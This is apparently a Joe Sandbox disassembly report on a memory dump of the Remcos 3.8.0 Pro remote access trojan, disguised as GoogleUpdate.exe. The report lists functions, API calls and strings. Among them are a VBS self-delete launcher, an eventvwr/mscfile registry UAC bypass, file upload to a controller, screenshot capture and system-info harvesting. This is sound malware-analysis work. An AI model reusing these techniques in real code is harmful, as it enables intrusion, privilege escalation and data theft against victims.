Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
API String ID: 3086580692-2596673759
Opcode ID: 0bf9094f8cb5ccb1e9936480546baf742d531f49806deb6dce3db096e9500c3f
Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
Opcode Fuzzy Hash: 0bf9094f8cb5ccb1e9936480546baf742d531f49806deb6dce3db096e9500c3f
Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B

Function 0040C3B8 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,0gj,0040E2B2), ref: 004112C5
Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8

Part of subcall function 004120E8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,0gj), ref: 00412104
Part of subcall function 004120E8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000410,?), ref: 0041211D
Part of subcall function 004120E8: RegCloseKey.KERNEL32(00000000), ref: 00412128

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
ExitProcess.KERNEL32 ref: 0040C57D

Strings

exepath, xrefs: 0040C3EA
H"G, xrefs: 0040C3C8
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C4B2
Temp, xrefs: 0040C453
""", 0, xrefs: 0040C49A
open, xrefs: 0040C56B
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040C520
.vbs, xrefs: 0040C418

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
API String ID: 1913171305-2600661426
Opcode ID: b9122ed72e7124bcff94e440666a7133dce096a2a06c353d0af5e61ef2c7c11c
Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
Opcode Fuzzy Hash: b9122ed72e7124bcff94e440666a7133dce096a2a06c353d0af5e61ef2c7c11c
Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99

Function 00413606 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

udp, xrefs: 004136B6, 004136BE, 004136C2
65535, xrefs: 00413609

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E

Function 0041601D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0041626A: __EH_prolog.LIBCMT ref: 0041626F

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00463050), ref: 0041611A
CloseHandle.KERNEL32(00000000), ref: 00416123
DeleteFileA.KERNEL32(00000000), ref: 00416132
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004160E6

Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

Strings

Temp, xrefs: 0041603E
@, xrefs: 004160C8
@%G, xrefs: 0041615F
P0F, xrefs: 004160EE
<, xrefs: 004160C1
@%G, xrefs: 004160F3

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$@%G$@%G$P0F$Temp
API String ID: 1704390241-846188940
Opcode ID: ad18d4deb5df07c6958a9f1bbc129edf31925435e799cf8b42d4c5e638feefef
Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
Opcode Fuzzy Hash: ad18d4deb5df07c6958a9f1bbc129edf31925435e799cf8b42d4c5e638feefef
Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99

Function 004385DA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438632
GetLastError.KERNEL32(?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043863F
__dosmaperr.LIBCMT ref: 00438646
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00438672
GetLastError.KERNEL32(?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043867C
__dosmaperr.LIBCMT ref: 00438683
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D35,?), ref: 004386C6
GetLastError.KERNEL32(?,?,?,?,?,?,00401D35,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004386D0
__dosmaperr.LIBCMT ref: 004386D7
_free.LIBCMT ref: 004386E3
_free.LIBCMT ref: 004386EA

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 948ee51c624fe98c9056840df44958d3f110f291e7eeb13a77c9f6c50528b75f
Instruction ID: 210192a7601cd99409c426d56dfac4e8df60f1af96207b6eb293af60208c7bc2
Opcode Fuzzy Hash: 948ee51c624fe98c9056840df44958d3f110f291e7eeb13a77c9f6c50528b75f
Instruction Fuzzy Hash: 4E31B17280030ABBDF11AFA5DC469AF7B69AF08325F10425EF81056291DF39CD11DB69

Function 004175E1 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 204COMMON

Download Yara Rule

Strings

7, xrefs: 004177E2
1, xrefs: 0041764D
3, xrefs: 0041770C
5, xrefs: 004177C1
4, xrefs: 00417770
2, xrefs: 004176AC
0, xrefs: 0041760B
6, xrefs: 004177CB

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: a8d0df93e5f8a066e7b011b6a1d3a7de81d979cc05f74ce077101d6e7286cc23
Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
Opcode Fuzzy Hash: a8d0df93e5f8a066e7b011b6a1d3a7de81d979cc05f74ce077101d6e7286cc23
Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6

Function 0044DC05 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044DC74
_free.LIBCMT ref: 0044DC82
_free.LIBCMT ref: 0044DDB0
_free.LIBCMT ref: 0044DDBB

Strings

tF, xrefs: 0044DE0C
pF, xrefs: 0044DC30, 0044DDF5

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free
String ID: pF$tF
API String ID: 269201875-2954683558
Opcode ID: 7dfb1ac3d5b365181f4c44670fb8630983d2fe278c740358833edae3060cfa76
Instruction ID: 6443803da38cddfc03973e112e1470be20db66c409a4168417c9ccfa39c85508
Opcode Fuzzy Hash: 7dfb1ac3d5b365181f4c44670fb8630983d2fe278c740358833edae3060cfa76
Instruction Fuzzy Hash: 1261D5B5D00205AFEB20CF69C841BAABBF4EF05B14F15416BE944EB381E7749D41DB58

Function 00405480 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040549F
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040554F
TranslateMessage.USER32(?), ref: 0040555E
DispatchMessageA.USER32(?), ref: 00405569
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00471F10), ref: 00405621
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405659

Part of subcall function 00404A81: send.WS2_32(FFFFFFFF,00000000,00000000,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B16

Strings

CloseChat, xrefs: 004055E9
GetMessage, xrefs: 004055D8
DisplayMessage, xrefs: 004055CC

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: e03c5fc2276f8e99434d912b06779df6448832c02025eab3f0aa6038bdb2ab6b
Instruction ID: 0f013d79663c92f7c21c274702d2b8200e9ba5951f20e13ff122dbd33ecc2bba
Opcode Fuzzy Hash: e03c5fc2276f8e99434d912b06779df6448832c02025eab3f0aa6038bdb2ab6b
Instruction Fuzzy Hash: 8B41C471A043016BCB00FB75DC5A86F77A9EB85714B40093EF946A31D2EF79C905CB9A

Function 004066A6 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 78COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
ExitProcess.KERNEL32 ref: 00406782

Strings

origmsc, xrefs: 00406710
mscfile\shell\open\command, xrefs: 004066D4
C:\ProgramData\GoogleDat\GoogleUpdate.exe, xrefs: 00406730
H"G, xrefs: 004066E8
open, xrefs: 0040676E
Software\Classes\mscfile\shell\open\command, xrefs: 0040673F
eventvwr.exe, xrefs: 0040674F

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: C:\ProgramData\GoogleDat\GoogleUpdate.exe$H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
API String ID: 1124553745-3476264819
Opcode ID: 54c70ac9d83207f5094eab5ee5734f36b3419636f249737f852e1b3a6bd0f6b0
Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
Opcode Fuzzy Hash: 54c70ac9d83207f5094eab5ee5734f36b3419636f249737f852e1b3a6bd0f6b0
Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE

Function 0041AA4F Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00000001), ref: 0041AA5D
GetConsoleWindow.KERNEL32 ref: 0041AA63
ShowWindow.USER32(00000000,00000000), ref: 0041AA76

Strings

CONOUT$, xrefs: 0041AA89
--------------------------, xrefs: 0041AADE
* BreakingSecurity.net, xrefs: 0041AAD0
3.8.0 Pro, xrefs: 0041AAC2
* Remcos v, xrefs: 0041AAB4
--------------------------, xrefs: 0041AAA6

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ConsoleWindow$AllocShow
String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
API String ID: 3461962499-4025029772
Opcode ID: bb5842c9276b924b84f2b7f99c8538917f0848a2b2f901183b5b0da883229c56
Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
Opcode Fuzzy Hash: bb5842c9276b924b84f2b7f99c8538917f0848a2b2f901183b5b0da883229c56
Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D

Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: c43c0efbf1c7785281d6f20f7d6db9af9847eaec0a277ab5b5550fdeb31cbd7f
Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
Opcode Fuzzy Hash: c43c0efbf1c7785281d6f20f7d6db9af9847eaec0a277ab5b5550fdeb31cbd7f
Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5

Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445645

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00445651
_free.LIBCMT ref: 0044565C
_free.LIBCMT ref: 00445667
_free.LIBCMT ref: 00445672
_free.LIBCMT ref: 0044567D
_free.LIBCMT ref: 00445688
_free.LIBCMT ref: 00445693
_free.LIBCMT ref: 0044569E
_free.LIBCMT ref: 004456AC

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88

Function 00417F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00417F6F
GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
Sleep.KERNEL32(000003E8), ref: 004180B3
GetLocalTime.KERNEL32(?), ref: 004180BB
Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA

Strings

time_%04i%02i%02i_%02i%02i%02i, xrefs: 00418055
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00418050, 00418071, 004180DF

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 489098229-3790400642
Opcode ID: 27fe380cc25d147f7437c47758b362fdae504e3481b31ceb198db4fdc3029009
Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
Opcode Fuzzy Hash: 27fe380cc25d147f7437c47758b362fdae504e3481b31ceb198db4fdc3029009
Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799

Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228

Sleep.KERNEL32(00000064), ref: 00415A46
DeleteFileW.KERNEL32(00000000), ref: 00415A7A

Strings

temp, xrefs: 004159CA
\sysinfo.txt, xrefs: 004159C5
/t , xrefs: 004159F9
dxdiag, xrefs: 00415A0F
open, xrefs: 00415A14

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 0ceb819d51a76422855a49a0a0394dd79b8568c852824c09e20ecbac12c50036
Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
Opcode Fuzzy Hash: 0ceb819d51a76422855a49a0a0394dd79b8568c852824c09e20ecbac12c50036
Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99

Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B

Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
TranslateMessage.USER32(?), ref: 0041B29E
DispatchMessageA.USER32(?), ref: 0041B2A8
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5

Strings

Remcos, xrefs: 0041B26D

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
